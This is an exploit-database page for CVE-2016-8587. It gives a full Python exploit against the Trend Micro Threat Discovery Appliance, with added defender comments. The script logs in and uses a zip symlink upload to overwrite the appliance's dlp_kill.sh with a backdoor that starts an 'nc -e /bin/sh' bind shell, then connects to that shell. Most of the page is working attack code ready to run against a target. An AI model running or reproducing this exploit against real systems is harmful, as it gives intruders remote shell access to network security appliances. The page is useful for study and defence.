
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 dlp_policy_upload.cgi Remote Code Execution Vulnerability (CVE-2016-8587)

21 Apr 2017 00:00:00 — Reported by RootType

Trend Micro Threat Discovery Appliance <= 2.6.1062r1 Remote Code Execution Vulnerability


                                                import os
import sys
import time
import zipfile
import requests
import threading
from cStringIO import StringIO

# Silences urllib3's InsecureRequestWarning: every request in this script
# passes verify=False, so the appliance's TLS certificate is never checked.
requests.packages.urllib3.disable_warnings()

def _get_bd():
    """Return the shell script that is written over the appliance's dlp_kill.sh.

    The script kills sensorworker/sensormain, waits up to 5 s for sensormain
    to exit (kill -9 on the last try), then runs the command held in the
    module-level global ``c`` (assigned in main()), spliced in via ``%s``.

    Defender notes:
      * A dlp_kill.sh under /opt/TrendMicro/MinorityReport/bin/ whose last
        line runs an unexpected command is the on-host artifact this payload
        leaves behind; integrity-monitor that directory.
      * ``[ "$sid" -eq "" ]`` is an integer test against an empty string; in
        /bin/sh this is a test error rather than a "no process" check. It is
        part of the runtime string and is left exactly as the author wrote it.
    """
    bd = """#!/bin/sh
kill `pidof sensorworker sensormain`
for i in `seq 0 4`;
do
    sleep 1;
    sid=`pidof sensormain`
    if [ "$sid" -eq "" ]; then
        break
    else
        if [ $i -eq 4 ]; then
            kill -9 $sid
        fi
    fi
done
`%s>/dev/null`
""" % c
    return bd

def _build_zip(CREATE_SYMLINK=False):
    """Build the in-memory zip archive that is uploaded to the appliance.

    Two archives are produced depending on ``CREATE_SYMLINK``:
      * True  -> a single entry ``si`` whose mode bits mark it as a symlink
                 and whose content is the link target
                 ``/opt/TrendMicro/MinorityReport/bin/``.
      * False -> a regular, world-writable entry ``si/dlp_kill.sh`` holding
                 the script from _get_bd().

    Returns the archive bytes. Side effect: the same bytes are also written
    to ``hax.zip`` in the current working directory (a forensic artifact on
    the machine that ran this script).

    Root cause from the defender's side: the server-side extractor honours
    symlink entries and then extracts later archives through them. The
    mitigation is to reject (or strip) archive entries with symlink mode bits
    and to refuse any entry whose resolved path escapes the extraction
    directory; the page header places the fix above 2.6.1062r1.
    """
    if CREATE_SYMLINK:
        zipinfo = zipfile.ZipInfo()
        zipinfo.filename = u'si'
        # External attrs carry Unix mode bits in the high 16 bits;
        # 0120000 (S_IFLNK) marks the entry as a symbolic link.
        zipinfo.external_attr |= 0120000 << 16L         # symlink file type
        zipinfo.compress_type = zipfile.ZIP_STORED
    f = StringIO()
    z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
    if CREATE_SYMLINK:
        # For a symlink entry the "file content" is the link target.
        z.writestr(zipinfo, "/opt/TrendMicro/MinorityReport/bin/")
    else:
        zipinfo = zipfile.ZipInfo("si/dlp_kill.sh")
        # 0777 in the high 16 bits: rwx for everyone once extracted.
        zipinfo.external_attr = 0777 << 16L # give full access to included filezipinfo

        # backdooring code, as we do
        z.writestr(zipinfo, _get_bd())
    z.close()
    # Local copy of the archive; not needed for the upload itself.
    test = open('hax.zip','wb')
    test.write(f.getvalue())
    test.close()
    return f.getvalue()

def we_can_upload_a_zip(CREATE_SYMLINK=False):
    """Upload the archive built by _build_zip() via dlp_policy_upload.cgi.

    Despite the original wording, the archive carries no PHP: it holds
    either the symlink entry or the replacement dlp_kill.sh (see
    _build_zip). Uses the module-level session ``s`` and ``upload_url``
    set in main().

    Returns True on an HTTP 200 reply and False otherwise. NOTE(review): a
    200 only shows the CGI answered; whether the file was actually accepted
    is not checked here -- presumably the author relies on the later
    extraction step.

    Detection: a multipart POST to /cgi-bin/dlp_policy_upload.cgi whose
    ``binary1`` part is a zip containing a symlink-mode entry, or a
    ``dlp_kill.sh`` entry, is the request to alert on.
    """
    multiple_files = {
        'Q_UPLOAD_ID': (None, ''),
        'binary1': ('pwn.zip', _build_zip(CREATE_SYMLINK), 'application/zip'),
        'submit': (None, 'Import')   
    }
    r = s.post(upload_url, files=multiple_files, verify=False)
    if r.status_code == 200:
        return True
    return False

def unzip():
    """Ask admin_dlp.cgi to process (extract) the previously uploaded archive.

    Posts ``act=save`` with ``upload_status=0`` on the module-level session
    ``s`` to ``unzip_url`` (both set in main()). The response is discarded
    and every exception is swallowed by the bare ``except``, so the function
    always returns True -- it carries no success signal. main() also runs
    this on a daemon thread for the final trigger, presumably because that
    request does not return while the replaced script is executing (not
    verifiable from this file).
    """
    try:
        r = s.post(unzip_url, data={"act":"save","upload_status":"0"}, verify=False)
    except:
        pass
    return True

def we_can_login():
    """Log in to the appliance with the password given on the command line.

    Posts ``passwd`` (global ``p``) and ``isCookieEnable=1`` to ``login_url``
    on session ``s``; the session cookie is what later requests rely on.
    Success is inferred from the string ``frame.cgi`` appearing in the
    response body. NOTE(review): main() calls this "bypass auth", but the
    code visible here simply submits the supplied credential -- no bypass is
    shown in this file.
    """
    r = s.post(login_url, data={ "passwd":p, "isCookieEnable":1 }, verify=False)
    if "frame.cgi" in r.text:
        return True
    return False

def main():
    """Drive the six-step chain: login, symlink upload/extract, script upload/extract, trigger.

    Command line: ``<target> <pass>``. All state shared with the helper
    functions (``c``, ``s``, ``t``, ``p`` and the three URLs) is published
    through module-level globals rather than passed as arguments.

    Defender notes: the observable server-side sequence is a logon.cgi POST,
    two dlp_policy_upload.cgi uploads each followed by an admin_dlp.cgi
    ``act=save`` POST, then a third admin_dlp.cgi POST. The page header
    states the affected versions as <= 2.6.1062r1.
    """
    global c, s, t, p, login_url, unzip_url, upload_url
    if len(sys.argv) != 3:
        print "(+) usage: %s <target> <pass>" % sys.argv[0]
        print "(+) eg: %s 172.16.175.123 admin" % sys.argv[0]
        sys.exit(-1)
    t = sys.argv[1]
    p = sys.argv[2]
    # Target host is interpolated unvalidated into every URL below.
    bu = "https://%s/" % t
    login_url  = "%scgi-bin/logon.cgi" % bu
    unzip_url  = "%scgi-bin/admin_dlp.cgi" % bu
    upload_url = "%scgi-bin/dlp_policy_upload.cgi" % bu
    s = requests.Session()

    # 1st we bypass auth and login
    if we_can_login():

        # we just use a bind, demonstrating that the target doesnt even have a proper firewall!
        # ``c`` is the command spliced into the script by _get_bd().
        c = "nc -e /bin/sh -lp 2122"
        print "(+) logged into the target..."
        print "(+) performing initial preflight attack...!"
        print "(+) uploading the zipped symlink..."

        # 2nd we upload symlink attack
        if we_can_upload_a_zip(CREATE_SYMLINK=True):
            print "(+) successfuly uploaded the zipped symlink"
            print "(+) extracting the symlink..."

            # 3rd we extract it
            unzip()
            print "(+) extracted the symlink!"
            time.sleep(2)   # let the server process things
            print "(+) uploading the zipped dlp_kill.sh..."

            # 4th we upload the backdoor
            if we_can_upload_a_zip(CREATE_SYMLINK=False):
                print "(+) successfuly uploaded the zipped log_cache.sh"
                print "(+) extracting the dlp_kill.sh to /opt/TrendMicro/MinorityReport/bin/..."

                # 5th extract the backdoor, crushing /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
                unzip()
                print "(+) extracted the dlp_kill.sh file!"
                print "(+) starting backdoor..."

                # 6th we trigger the exec of /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
                # Run on a daemon thread so the script continues while the
                # request is outstanding (unzip() itself never reports failure).
                thread = threading.Thread(target=unzip, args=())
                thread.daemon = True
                thread.start()
                print "(+) backdoor started !"
                print "(+) dont forget to clean /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh !"
                print "(+) run: sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh"
                time.sleep(2)
                # NOTE(review): argv[1] is passed to a shell via os.system
                # without quoting; a malformed target string reaches /bin/sh.
                os.system("nc %s 2122" % t)
# Script entry point: only run the chain when executed directly, not on import.
if __name__ == "__main__":
    main()
                              


21 Apr 2017 00:00 (current)

7.4 — High risk

Vulners AI Score: 7.4

EPSS: 0.00526